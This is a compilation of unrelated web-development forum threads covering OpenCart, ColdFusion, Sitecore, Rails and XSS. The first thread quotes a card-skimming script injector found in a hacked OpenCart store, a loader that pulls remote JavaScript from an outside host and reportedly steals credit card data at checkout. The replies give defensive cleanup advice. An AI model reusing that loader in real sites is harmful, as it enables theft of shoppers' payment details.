Opencart site is hacked how to fix? - opencart

I found this in my google analytic config
var s = document.querySelector('head');
var sc = document.createElement('script');
sc.src= "https://tags-manager.com/gtags/script2?utm_referer=?utm_source=&utm_content=&utm_referer="+location.hostname;
s.appendChild(sc);
It's adding in checkout page other filed and sending credit card info
Have you had a similar case?

Put the e-Shop in maintenance mode and start by disabling all [OCMOD] & [VQMOD]. See if that fixes your issues.
If YES, then start enabling one by one the [OCMOD] & [VQMOD] to see which one is causing the problem.
If NO, you should ask someone else to fix it for you. From my experience most of the times you should go to a new clean installation of Opencart (even maybe a new server if is compromised).

Related

OpenCart 2.2 error undefined when viewing order info

When I click the view button next to an order (whether from the dashboard or orders page) I get an "error undefined" alert as the page is loading.
I also get the same error when I try and change the order status from the same page and it yields no results.
It also produces no errors in the error log.
I can however change the order status from the edit order page but this is very inconvenient.
If anyone knows a common solution or maybe pointers as to how to start diagnosing the issue please post them here. I've been hunting for answers most of the day and have had no luck with any solutions.
ty in advance.
if you are using SSL Tyr this at upload/admin/controller/sale/order.php
After
$data['store_name'] = $order_info['store_name'];
Remove
$data['store_url'] = $this->request->server['HTTPS'] ? preg_replace("/^http:\/\//", "https://", $order_info['store_url']) : $order_info['store_url'];
Add
$data['store_url'] = $this->request->server['HTTPS'] ? HTTPS_CATALOG : HTTP_CATALOG;
Unfortunately OpenCart 2.2.0.0 is known to be a bit buggy.
Best thing would be to start using 2.3.0.2 (avoid 2.3.0.0 and 2.3.0.1) if possible.

How to enable Code Assist for ColdFusion builder 2.0.1?

I tried my best to enable the code assist in ColdFusion builder 2.0.1 but no luck.
I found two helping pages:
http://help.adobe.com/en_US/ColdFusionBuilder/2.0/Using/WS0ef8c004658c1089-554789f8121af8f0c8c-7ffb.html
and
http://help.adobe.com/en_US/ColdFusionBuilder/2.0/Using/WSf01dbd23413dda0e1736ebc1213a528ab0-7ffb.html#WS0ef8c004658c1089794dbeb6124c7814753-8000
what I am looking for is to let the coldFusion Builder assist me by auto-completing the REQUEST, SESSION, & APPLICATIONS variables. I tried the follow the instructions in the second link but it didn't work, maybe I wrote some incorrect data?
If any one managed to let it work, please help me.
Assuming you have set up the server correctly in CF Builder, it will talk to the server and cache the respond of what methods does a CFC have. (Console Tab: "Server is available. Getting server settings.")
E.g. If Person.cfc has property Name and Age with accessors=true, and you type p = new Person(), then "p." (Ctrl+Space) should see getAge(), getName(), setAge(), setName(). If you got that to work, you have set it up correctly.
As for variables in REQUEST, SESSION, & APPLICATIONS scopes, I think CFB would see if you have referenced them before on the same .cfm and may give you autocomplete, but don't count on it to be smart enough to know exactly what variables are there in the scopes.

Sitecore VirtualFolder that is a Language Abreviation

We need to have our site have a starting url of domain.com/fa/en
I can setup the site node to have the virtualFolder and physicalFolder set to "/foo/bar" and things work when I go to domain.com/foo/bar I am shown the home page.
However if I set this to "/fa/en" I get a document not found. I believe what is happening is Sitecore sees the "fa" and thinks it is a language setter (fa is portugese I think). How do I tell Sitecore that this is not a language indicator and it is a virtualFolder?
thanks,
~james
The fix is in these two links in case anyone else runs into the issue:
http://sdn.sitecore.net/SDN5/Forum/ShowPost.aspx?PageIndex=1&PostID=61854
http://sitecoreblog.patelyogesh.in/2013/11/sitecore-item-with-language-name.html

rails 3 cookies

I have a simple app where users type in stuff in a text filed to get various results. I would like a feature where if a user enters something and then closes the browser tab, the next time they come, I can show them their previous/recent searches. This will persist even if they close the whole browser and open it again.
I believe this can be done by help of cookies. Are there some good rails3 gems for using cookies or any simple tutorial that could guide me in a direction?
http://railstutorial.org/chapters/sign-in-sign-out#sec:remember_me
This is a great book to get you started with rails3. (I would recommend to read it from the beginning)
In the link above, listing 9.12 gives you a good explanation about cookies.
Store the info in the session object:
session[:user_entry] = the_user_entry
http://guides.rubyonrails.org/action_controller_overview.html#session

How to handle Script Attack in application

We are facing issues of javascript getting embedded into message body,
following is the code snippet of the javascript,
} {*\htmltag241 var
DanaShimData="var DSJsFuncs =
,null,,,,[{nm:\"Refresh\",lcnm:\"refresh\",flg:0xb},{nm:\
\"Install\",flg:0xf},{nm:\"writeln\",flg:0x3f},{nm:\
"GotoURL\
\",flg:0xe},{nm:\"AddRoot\",lcnm:\"addroot\",flg:0xb},{nm:\
\"LoadURL\",lcnm:\"loadurl\",flg:0xb},{nm:\"addRule\
",flg:0xf},
{nm:\"postURL\",lcnm:\"posturl\",flg:0x12},{nm:\
"replace\ \",flg:0x12f},],[{
Could anyone please let us know if you have observed such occurances /
findings.
Any helps appreciated.
Thanks,
Sudipta Ghosh
Try to use HTMLCodeFormat() or HTMLEditFormat().
See docs.
There is a project called 'AntiSammy' (http://www.antisamy.net/) which uses files to combat XSS attacks that are provided by big sites like Slashdot and eBay. You may want to look at extracting the AntiSammy code to help you.
Here is a post by Peter Freitag on using AntiSammy without ColdBox.
http://www.petefreitag.com/item/760.cfm
Here are the docs for the ColdBox Framework:
http://wiki.coldbox.org/wiki/Plugins:AntiSamy.cfm
Also make sure you use cfqueryparams, captchas or some sort of session authentication form posts.